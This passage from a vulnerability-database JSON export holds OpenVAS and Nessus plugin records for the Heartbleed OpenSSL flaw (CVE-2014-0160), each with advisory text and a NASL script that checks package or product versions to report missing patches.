script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "scanner", "description": "Symantec Messaging Gateway (SMG) Appliance 10.6.x management console was\nsusceptible to potential unauthorized loss of privileged information due to an inadvertent static link of an\nupdated component library to a version of SSL susceptible to the Heartbleed vulnerability (CVE-2014-0160).", "modified": "2018-10-25T00:00:00", "published": "2016-05-17T00:00:00", "id": "OPENVAS:1361412562310105722", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105722", "title": "Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_symantec_messaging_gateway_sym16_007.nasl 12083 2018-10-25 09:48:10Z cfischer $\n#\n# Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:symantec:messaging_gateway\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105722\");\n script_version(\"$Revision: 12083 $\");\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-25 11:48:10 +0200 (Thu, 25 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-05-17 13:54:13 +0200 (Tue, 17 May 2016)\");\n\n script_name(\"Symantec Messaging Gateway 10.6.x ACE Library Static Link to Vulnerable SSL Version (SYM16-007)\");\n\n script_tag(name:\"summary\", value:\"Symantec Messaging Gateway (SMG) Appliance 10.6.x management console was\nsusceptible to potential unauthorized loss of privileged information due to an inadvertent static link of an\nupdated component library to a version of SSL susceptible to the Heartbleed vulnerability (CVE-2014-0160).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Symantec became aware of a recently updated ACE library shipped in SMG 10.6.x\nthat was statically linked inadvertently to a version of SSL susceptible to CVE-2014-0160, Heartbleed vice\ndynamically linked to the non-vulnerable SSL version in the shipping OS of the Appliance.\");\n\n script_tag(name:\"affected\", value:\"SMG 10.x, 10.6.1 and earlier.\");\n\n script_tag(name:\"solution\", value:\"Update to SMG 10.6.1-3 or newer.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2016&suid=20160512_00\");\n\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_dependencies(\"gb_symantec_messaging_gateway_detect.nasl\");\n script_mandatory_keys(\"symantec_smg/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE, nofork:TRUE ) ) exit( 0 );\n\nif( version_is_less( version:version, test_version:\"10.6.1\" ) ) VULN = TRUE;\n\nif( version == \"10.6.1\" )\n{\n if( patch = get_kb_item( \"symantec_smg/patch\" ) )\n if( int( patch ) < 3 ) VULN = TRUE;\n}\n\nif( VULN )\n{\n if( patch ) version = version + \" Patch \" + patch;\n report = report_fixed_ver( installed_version:version, fixed_version:'10.6.1 Patch 3' );\n security_message( port:0, data:report );\n exit(0);\n}\n\n\nexit( 99 );\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:31", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2014-04-10T00:00:00", "id": "OPENVAS:1361412562310850582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850582", "title": "SuSE Update for update openSUSE-SU-2014:0492-1 (update)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0492_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for update openSUSE-SU-2014:0492-1 (update)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850582\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-10 13:36:01 +0530 (Thu, 10 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:0492-1 (update)\");\n script_tag(name:\"affected\", value:\"update on openSUSE 13.1, openSUSE 12.3\");\n script_tag(name:\"insight\", value:\"This openssl update fixes one security issue:\n\n - bnc#872299: Fixed missing bounds checks for heartbeat\n messages (CVE-2014-0160).\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:0492_1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'update'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE12\\.3|openSUSE13\\.1)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSE12.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~1.44.1\", rls:\"openSUSE12.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel\", rpm:\"libopenssl-devel~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0\", rpm:\"libopenssl1_0_0~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo\", rpm:\"libopenssl1_0_0-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debuginfo\", rpm:\"openssl-debuginfo~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-debugsource\", rpm:\"openssl-debugsource~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl-devel-32bit\", rpm:\"libopenssl-devel-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-32bit\", rpm:\"libopenssl1_0_0-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopenssl1_0_0-debuginfo-32bit\", rpm:\"libopenssl1_0_0-debuginfo-32bit~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-doc\", rpm:\"openssl-doc~1.0.1e~11.32.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-04-08T00:00:00", "id": "OPENVAS:1361412562310881918", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881918", "title": "CentOS Update for openssl CESA-2014:0376 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for openssl CESA-2014:0376 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881918\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-08 11:30:13 +0530 (Tue, 08 Apr 2014)\");\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"CentOS Update for openssl CESA-2014:0376 centos6\");\n\n script_tag(name:\"affected\", value:\"openssl on CentOS 6\");\n script_tag(name:\"insight\", value:\"OpenSSL is a toolkit that implements the Secure Sockets Layer\n(SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled TLS and\nDTLS Heartbeat Extension packets. A malicious TLS or DTLS client or server\ncould send a specially crafted TLS or DTLS Heartbeat packet to disclose a\nlimited portion of memory per request from a connected client or server.\nNote that the disclosed portions of memory could potentially include\nsensitive information such as private keys. (CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this issue.\nUpstream acknowledges Neel Mehta of Google Security as the original\nreporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For the update to take\neffect, all services linked to the OpenSSL library (such as httpd and other\nSSL-enabled services) must be restarted or the system rebooted.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0376\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-April/020249.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssl'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssl\", rpm:\"openssl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-devel\", rpm:\"openssl-devel~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-perl\", rpm:\"openssl-perl~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssl-static\", rpm:\"openssl-static~1.0.1e~16.el6_5.7\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "nessus": [{"lastseen": "2020-01-01T00:18:34", "bulletinFamily": "scanner", "description": "The remote host is running a version of McAfee Email Gateway (MEG)\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.", "modified": "2020-01-02T00:00:00", "id": "MCAFEE_EMAIL_GATEWAY_SB10071.NASL", "href": "https://www.tenable.com/plugins/nessus/73832", "published": "2014-05-02T00:00:00", "title": "McAfee Email Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73832);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10071\");\n\n script_name(english:\"McAfee Email Gateway OpenSSL Information Disclosure (SB10071) (Heartbleed)\");\n script_summary(english:\"Checks MEG version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by an information disclosure\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of McAfee Email Gateway (MEG)\nthat is affected by an information disclosure due to a flaw in the\nOpenSSL library, commonly known as the Heartbleed bug. An attacker\ncould potentially exploit this vulnerability repeatedly to read up to\n64KB of memory from the device.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:email_gateway\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mcafee_email_gateway_version.nbin\");\n script_require_keys(\"Host/McAfeeSMG/name\", \"Host/McAfeeSMG/version\", \"Host/McAfeeSMG/patches\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = get_kb_item_or_exit(\"Host/McAfeeSMG/name\");\nversion = get_kb_item_or_exit(\"Host/McAfeeSMG/version\");\npatches = get_kb_item_or_exit(\"Host/McAfeeSMG/patches\");\n\n# Determine fix.\nif (version =~ \"^7\\.5\\.\")\n{\n fix = \"7.5.2846.114\";\n hotfix = \"7.5h960401\";\n}\nelse if (version =~ \"^7\\.6\\.\")\n{\n fix = \"7.6.2810.114\";\n hotfix = \"7.6h960405\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1 && hotfix >!< patches)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report = '\\n' + app_name + ' ' + version + ' is missing patch ' + hotfix + '.\\n';\n security_warning(extra:report, port:port);\n }\n else security_warning(port:port);\n exit(0);\n}\nelse audit(AUDIT_PATCH_INSTALLED, hotfix);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T02:11:12", "bulletinFamily": "scanner", "description": "According to its self-reported version number, the version of Symantec\nEndpoint Protection Manager (SEPM) installed on the remote host is\naffected by an out-of-bounds read error, known as the ", "modified": "2020-01-02T00:00:00", "id": "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL", "href": "https://www.tenable.com/plugins/nessus/73964", "published": "2014-05-12T00:00:00", "title": "Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73964);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_bugtraq_id(66690);\n script_xref(name:\"CERT\", value:\"720951\");\n script_xref(name:\"EDB-ID\", value:\"32745\");\n script_xref(name:\"EDB-ID\", value:\"32764\");\n script_xref(name:\"EDB-ID\", value:\"32791\");\n script_xref(name:\"EDB-ID\", value:\"32998\");\n\n script_name(english:\"Symantec Endpoint Protection Manager < 12.1 RU4 MP1a OpenSSL Heartbeat Information Disclosure (Heartbleed)\");\n script_summary(english:\"Checks SEPM version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Symantec Endpoint Protection Manager installed on the\nremote host is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Symantec\nEndpoint Protection Manager (SEPM) installed on the remote host is\naffected by an out-of-bounds read error, known as the 'Heartbleed Bug'\nin the included OpenSSL version.\n\nThis error is related to handling TLS heartbeat extensions that could\nallow an attacker to obtain sensitive information such as primary key\nmaterial, secondary key material, and other protected content. Note\nthis affects both client and server modes of operation.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.symantec.com/en_US/article.TECH216558.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.heartbleed.com\");\n script_set_attribute(attribute:\"see_also\", value:\"https://eprint.iacr.org/2014/140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/vulnerabilities.html#2014-0160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 12.1 RU4 MP1a or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0160\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/02/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:symantec:endpoint_protection_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"symantec_endpoint_prot_mgr_installed.nasl\");\n script_require_keys(\"SMB/sep_manager/path\", \"SMB/sep_manager/ver\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\ndisplay_ver = get_kb_item_or_exit('SMB/sep_manager/ver');\npath = get_kb_item_or_exit('SMB/sep_manager/path');\n\n# Versions 12.1 RU2 (12.1.2015.2015) to SEPM 12.1 RU4 MP1 (12.1.4100.4126) are vulnerable\nlower_cutoff = \"12.1.2015.2015\";\nhigher_cutoff = \"12.1.4100.4126\";\n\nif (\n ver_compare(ver:display_ver, fix:lower_cutoff, strict:FALSE) >= 0 &&\n ver_compare(ver:display_ver, fix:higher_cutoff, strict:FALSE) <= 0\n)\n{\n fixed_ver = \"12.1.4104.4130 (12.1 RU4 MP1a)\";\n\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : '+ path +\n '\\n Installed version : '+ display_ver +\n '\\n Fixed version : '+ fixed_ver +\n '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, 'Symantec Endpoint Protection Manager', display_ver, path);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-01T01:14:11", "bulletinFamily": "scanner", "description": "Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL\nv2/v3) and Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nAn information disclosure flaw was found in the way OpenSSL handled\nTLS and DTLS Heartbeat Extension packets. A malicious TLS or DTLS\nclient or server could send a specially crafted TLS or DTLS Heartbeat\npacket to disclose a limited portion of memory per request from a\nconnected client or server. Note that the disclosed portions of memory\ncould potentially include sensitive information such as private keys.\n(CVE-2014-0160)\n\nRed Hat would like to thank the OpenSSL project for reporting this\nissue. Upstream acknowledges Neel Mehta of Google Security as the\noriginal reporter.\n\nAll OpenSSL users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. For the update\nto take effect, all services linked to the OpenSSL library (such as\nhttpd and other SSL-enabled services) must be restarted or the system\nrebooted.", "modified": "2020-01-02T00:00:00", "id": "REDHAT-RHSA-2014-0376.NASL", "href": "https://www.tenable.com/plugins/nessus/73396", "published": "2014-04-08T00:00:00", "title": "RHEL 6 : openssl (RHSA-2014:0376)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0376. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73396);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:38\");\n\n script_cve_id(\"CVE-2014-0160\");\n script_xref(name:\"RHSA\", value:\"2014:0376\");\n\n script_name(english:\"RHEL 6 : openssl (RHSA-2014:0376)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated openssl packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nImportant security impact. A Common Vulnerability Scoring 